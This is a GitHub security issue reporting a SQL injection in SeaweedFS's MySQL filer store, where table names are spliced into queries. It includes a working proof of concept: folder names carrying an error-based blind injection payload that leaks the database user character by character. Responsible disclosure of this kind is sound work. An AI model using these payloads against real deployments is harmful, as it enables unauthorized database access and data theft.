### ISSUE TITLE
Security Vulnerability Report

### ISSUE THREAD

**Issue by sud0why** [seaweedfs/seaweedfs#5710]
Security Vulnerability Report

I'm from Yunding Security Lab of Tencent. I have discovered a sql injection vulnerability in the SeaweedFS project.

Given that I have posted the vulnerability details in a GitHub issue, I recommend that you fix it as soon as possible. SQL injection can be prevented by using parameterized queries, filtering, or restricting input.

# Code

The cause of the vulnerability is that the user input is spliced ​​into the SQL statement.

Affect SeaweedFS Filer Server, when use mysql as filemeta database.

Affect File: `weed/filer/abstract_sql/abstract_sql_store.go`

Affect Object: AbstractSqlStore

Affect Method is below. `select` injection can cause serious issues, while `DROP`, `CREATE` and `DELETE` have relatively smaller impacts.

- FindEntry

```go
func (gen *SqlGenMysql) GetSqlFind(tableName string) string {
	return fmt.Sprintf("SELECT `meta` FROM `%s` WHERE `dirhash` = ? AND `name` = ? AND `directory` = ?", tableName)
}
```

- ListDirectoryPrefixedEntries

```go
func (gen *SqlGenMysql) GetSqlListExclusive(tableName string) string {
	return fmt.Sprintf("SELECT `name`, `meta` FROM `%s` WHERE `dirhash` = ? AND `name` > ? AND `directory` = ? AND `name` LIKE ? ORDER BY `name` ASC LIMIT ?", tableName)
}
```

- CreateTable

```go
func (gen *SqlGenMysql) GetSqlCreateTable(tableName string) string {
	return fmt.Sprintf(gen.CreateTableSqlTemplate, tableName)
}
```

- DeleteEntry

```go
func (gen *SqlGenMysql) GetSqlDelete(tableName string) string {
	return fmt.Sprintf("DELETE FROM `%s` WHERE `dirhash` = ? AND `name` = ? AND `directory` = ?", tableName)
}
```

- deleteTable

```go
func (gen *SqlGenMysql) GetSqlDropTable(tableName string) string {
	return fmt.Sprintf(gen.DropTableSqlTemplate, tableName)
}
```

# Proof of Concept

Next, I will demonstrate the existence of the vulnerability. The following proof targets the actual impact location, which is `AbstractSqlStore.ListDirectoryPrefixedEntries`.

My `filer.toml` content is:

```toml
[mysql2]  # or memsql, tidb
enabled = true
createTable = """
  CREATE TABLE IF NOT EXISTS `%s` (
    `dirhash`   BIGINT NOT NULL,
    `name`      VARCHAR(766) NOT NULL,
    `directory` TEXT NOT NULL,
    `meta`      LONGBLOB,
    PRIMARY KEY (`dirhash`, `name`)
  ) DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin;
"""
hostname = "127.0.0.1"
port = 3309
username = "root"
password = "xxxxx"
database = "seaweedfs"              # create or use an existing database
connection_max_idle = 2
connection_max_open = 100
connection_max_lifetime_seconds = 0
interpolateParams = false
# if insert/upsert failing, you can disable upsert or update query syntax to match your RDBMS syntax:
enableUpsert = true
upsertQuery = """INSERT INTO `%s` (`dirhash`,`name`,`directory`,`meta`) VALUES (?,?,?,?) AS `new` ON DUPLICATE KEY UPDATE `meta` = `new`.`meta`"""
```

My test mysql database user is `root`, so `ascii(mid(user() from 1 for 1))=114`. Follow the steps below.

1. Create a new folder with name `poc` in `buckets`, this make database table `poc` is exist.

2. Create a new folder in `buckets` with name 

```
poc` WHERE (IF(ascii(mid(user() from 1 for 1))=114, exp(710), 0)) and 1=? and 1=? and 1=? and 1=? and 1=?; #
```

3. Create a new folder in `buckets` with name

```
poc` WHERE (IF(ascii(mid(user() from 1 for 1))=124, exp(710), 0)) and 1=? and 1=? and 1=? and 1=? and 1=?; #
```

4. Visit folder below, it will return 404 with error, because `exp(710)`

```
poc` WHERE (IF(ascii(mid(user() from 1 for 1))=114, exp(710), 0)) and 1=? and 1=? and 1=? and 1=? and 1=?; #
```

5. Visit folder below, it will return 200.

```
poc` WHERE (IF(ascii(mid(user() from 1 for 1))=124, exp(710), 0)) and 1=? and 1=? and 1=? and 1=? and 1=?; #
```

![企业微信截图_17192984751443](https://github.com/seaweedfs/seaweedfs/assets/16025404/fb37f4ac-0085-46dc-a4d3-6a0ccbd481a4)

![企业微信截图_17192987017146](https://github.com/seaweedfs/seaweedfs/assets/16025404/8276d49d-b884-4f65-b5d1-c2d0dfa22751)

![企业微信截图_17192987152401](https://github.com/seaweedfs/seaweedfs/assets/16025404/b9859974-a056-485c-bb9e-f454a02d70e1)
